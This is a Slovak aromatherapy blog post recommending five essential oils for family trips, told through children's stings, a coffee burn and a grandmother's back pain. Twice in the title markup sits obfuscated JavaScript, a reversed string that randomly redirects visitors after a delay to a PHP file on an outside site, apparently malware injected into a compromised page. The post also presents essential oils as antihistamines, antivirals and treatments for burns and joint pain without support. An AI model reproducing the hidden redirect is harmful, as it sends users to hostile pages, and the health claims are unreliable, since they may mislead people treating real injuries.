<“h1″ class="w-post-elm post_title us_custom_f5286e8b entry-title" itemprop="headline">5 esenciálnych olejov, ktoreré si určite pribaľte do tašky na každý výlet) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom%22%3A%220.5rem%22%2C%22font-family%22%3A%22h1%22%7D%7D“]
Nekomentované
[us_separator size=“small“]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom%22%3A%221.5rem%22%7D%7D“]

Pozdravujem vás z krásneho prostredia Slanských vrchov. Tu na východe radi trávime prázdniny u našej babky a dedka. Niet nad celý deň strávený na záhrade, starať sa o kvety, bylinky a úrodu a priamo zo stromu oberať ovocie ako inak … priamo do úst. A naviac máme to šťastie, že dedko – celoživotný lesník tejto oblasti – nás prevedie okolitými lesmi a dolinami, ukáže najkrajšie miesta a odhalí tajomstvá okolia. A tak jeden deň nazbierame najkrajšie hríby, iný zas blahodarné bylinky a užívame si pobyt v prírode a v lese.

Ale čert ani tu nespí a tak deň za dňom prichádzajú nehody a takpovediac zdravotné komplikácie. Priznávam, tento výlet sa nám naozaj „darilo“ a neraz som túžila mať so sebou väčšiu aromataštičku. Ale do môjho minimalistického zbalenia to nevošlo a tých pár základných olejov nám dokázalo všestranne pomôcť. Tak vám ponúkam zhrnutie, 5 esenciálnych olejov, ktoré si určite zabaľte:

[us_separator]

#1 Levanduľa (Lavandula angustifolia)

Ako nám pomohla? Napríklad..mladšiu dcérku poštípala nejaká agresívna osa priamo na dlaň..lebo že ona ju len chcela zabiť, nie chytiť (sedela dedkovi na pleci 🤨, to je jej veľký obľúbenec). Nebudem klamať, že bolo veľa plaču..a moje deti sú skutočne deťmi aromaterapeutky..v úpornom boľavom plači sa len snažila vysloviť, že tam chce dať kvapku! Hneď som aplikovala levanduľu, ktorá je výborným pomocníkom na štípance, upokojí bolesť, svrbenie, aj prípadný opuch keďže je to prírodné antihistaminikum. A upokojí aj nervový systém..aby sa ukľudnil po negatívnom zážitku. Dnes už hrdo vystrkuje rúčku: „aha, už sa zahojilo“.

Horšie to bolo na ďalší deň, staršia dcérka v snahe o samostatnosť obarila horúcou kávou seba aj tatina. Naša kamarátka, esenciálny olej levanduľa opäť zachraňovala.  Je overeným pomocníkom pri popálení a celkovo pre hojenie rán. A okrem utíšenia bolesti chráni poranené miesto aj proti infekcii. Našťastie popálenie bolo malé, rana sa rýchlo zacelila, pľuzgierik sa stratil, pokožka sa skutočne veľmi rýchlo zahojila.

[us_separator]

#2 Mäta (Mentha piperita)

Pri každej ceste autom nám jej svieža vôňa zaháňa nevoľnosť a šoférovi pomáha udržať koncentráciu. Dokáže však ešte oveľa viac! Upokojí trávenie, v lete napríklad aj veľmi užitočne ochladzuje. Skúste si pripraviť jednoduchý ochladzujúci sprej, do 50ml fľaše s rozprašovačom pridajte vodu a približne 3 kvapky mäty. Nezabudnite pred použitím dobre premiešať. Nehovoriac o uvoľnení a otvorení dýchania, čo je v horúcom a navyše alergickom období častý problém. Málokto však vie, že mäta je aj skvelým pomocníkom proti bolesti. Hlava? Chrbát? Žiadny problém.

Pozor však pri deťoch do 6 rokov. Jej dominujúca zložka menthol môže byť pre ne príliš silná.

Pomedzi to riešime úmornú inváziu komárov. Ešteže máme prírodný repelent s esenciálnymi olejmi. Ten je ako bonus k mojej minimalistickej taštičke. Odporúčam proti rôznym hmyzom, aj kliešťom. Samozrejme aplikáciu treba priebežne opakovať. Akú zmes som pripravila nám? Pozrite si vo videu tu. Alebo použite hotovú zmes, napríklad Terrashield. Je skvelým jednoduchým riešením doma či na cesty, keď nemáte v zásobe množstvo iných olejov, aby ste si zarobili vlastnú. Za nás hlásim pár nepríjemných štípancov, hlavne keď už je hmyzu priveľa, nestíhala som pokryť všetky prítomné ruky nohy.

[us_separator]

#3 Tea tree – čajovník (Melaleuca alternifolia)

Áno, viem, mnohí si poviete, že táto vôňa vám skutočne nevyhovuje. Je akoby medicínska, ale prináša veľmi veľa výhod pre naše zdravie. Pomáha pri zápaloch, letných boliestkach či odreninách, ideálne sa pritom kombinuje s kevanduľou. Zabojuje aj proti vírusom, pri bolesti hrdla aj zubov. Len prekloktajte hrdlo a ústa lyžicou vody s 1 kvapkou čajovníka hneď pri prvých pocitoch nepohodlia. Alebo kedykoľvek – preventívne. Extra darček? Zdravé ďasná.

[us_separator]

#4 Pomaranč (Citrus sinensis)

Citrus ani v minimalistickej taštičke esenciálnych olejov zbalenej na cesty u nás nesmie chýbať. Teraz v lete som si vybrala pomaranč, lebo je menej fototoxický ako najbežnejšie známy citrón, alebo aj iné citrusové esenciálne oleje. Pomáha s trávením, napríklad aj v kombinácii s mätou, podporuje prúdenie energie aj prekrvenie. A k tomu všetkému pozdvihuje optimizmus a ľahkosť. Skvelý partner na dovolenku, čo poviete?

[us_separator]

#5 Kadidlo (Boswelia carterii)

Náš silný všestranný pomocník. Uľahčuje dýchanie, zahojí a vyhladí pleť, zápaly, poranenia, bolesti a stuhnutia. Úžasne podporuje imunitu aj pozdvihne náladu, upokojí myseľ. Napríklad aj tú detskú po dni plnom zážitkov. A nezabúdajte aj na seba…doprajte si chvíľku ticha, pokoja, meditácie. Kadidlo vás naladí na tú správnu vlnu.

[us_separator size=“small“]
[us_separator]

My sme sa nevyhli ani vážnejšiemu problému. Babku počas našej návštevy rozbolel chrbát a bedrový kĺb, tak akútne že s nami už nevedela stráviť deň, pretože ju bolelo aj stáť na nohách, ostali sme smutní. A všetci pozerali na mňa…tu mi najviac chýbali ďalší esenciálni pomocníci. Ale nevzdala som to. Namiešala som masážny olej, využila som protizápalové účinky čajovníka aj kadidla, upokojenie levandule, prekrvenie a povzbudenie pomaranča a mätu proti bolesti. Spolu v krásnej synergii bojovali proti stuhnutiu. Samozrejme, že nevyliečia. Tento láskavý človek si už niečo odchodil. A nepoznám recept na zázraky na počkanie. Dôležité však je poskytnúť úľavu.

A dnes, na druhý deň, sme zvládli krásny výlet lesom, relatívne strmým svahom, trochu nehostinným priznávam, aby sme na vrchu, na krásnej lúke nazbierali odmenu, sladké čučoriedky. A babka sa tešila, so slovami : „Ta to skutočne zázračné tote olejky!“ Esenciálne oleje používa už viac ako 3 roky, a stále nájde pre ne nové nadšenie. Ako aj ja! So spokojným bruškom, s radosťou v duši som opäť raz vďačná aromaterapii, že nám pomohla mať krásne zážitky.

Želám aj vám aroma deň. Každý deň.

1× mesačne vám zdarma pošlem
rady, tipy
a know-how

Ideálne kurzy aromaterapie pre Vás

[us_separator size=“small“]
Menu